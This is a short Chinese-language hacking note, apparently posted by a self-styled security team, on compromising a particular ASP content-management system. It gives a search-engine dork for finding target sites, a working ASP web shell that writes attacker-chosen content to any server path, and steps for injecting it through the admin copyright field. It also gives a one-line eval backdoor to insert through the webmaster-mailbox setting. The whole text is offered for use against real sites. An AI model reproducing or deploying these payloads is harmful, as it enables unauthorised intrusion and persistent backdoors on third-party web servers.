QQ:2373664058
关注网络安全 热爱网络技术
inurl:printpage.asp?ArticleID=
在后台版权信息栏里写入小马
if Request("t2ck")="520" then
dim allen,creat,text,thisline,path
if Request("creat")="yes" then
Set fs = CreateObject("Scripting.FileSystemObject")
Set outfile=fs.CreateTextFile(server.mappath(Request("path")))
outfile.WriteLine Request("text")
Response.write "T2Ck安全团队"
end if
Response.write "<form method='POST'action='"&Request.ServerVariables("URL")&"?t2ck=520&creat=yes'>"
Response.write "<textarea name='text'>"&thisline&"</textarea><br>"
Response.write "<input type='text' name='path' value='"&Request("path")&"'>"
Response.write "<input name='submit' type='submit' value='ok' ></form>"
Response.end
end if
%>
别跳转任何页面。直接在ie地址栏内将admin/Admin_Login.asp替换成 inc/config.asp?t2ck=520
可以在站长信箱那里写入"%><%eva(request("t2ck"))%><%' 然后直接连接inc目录下的config.asp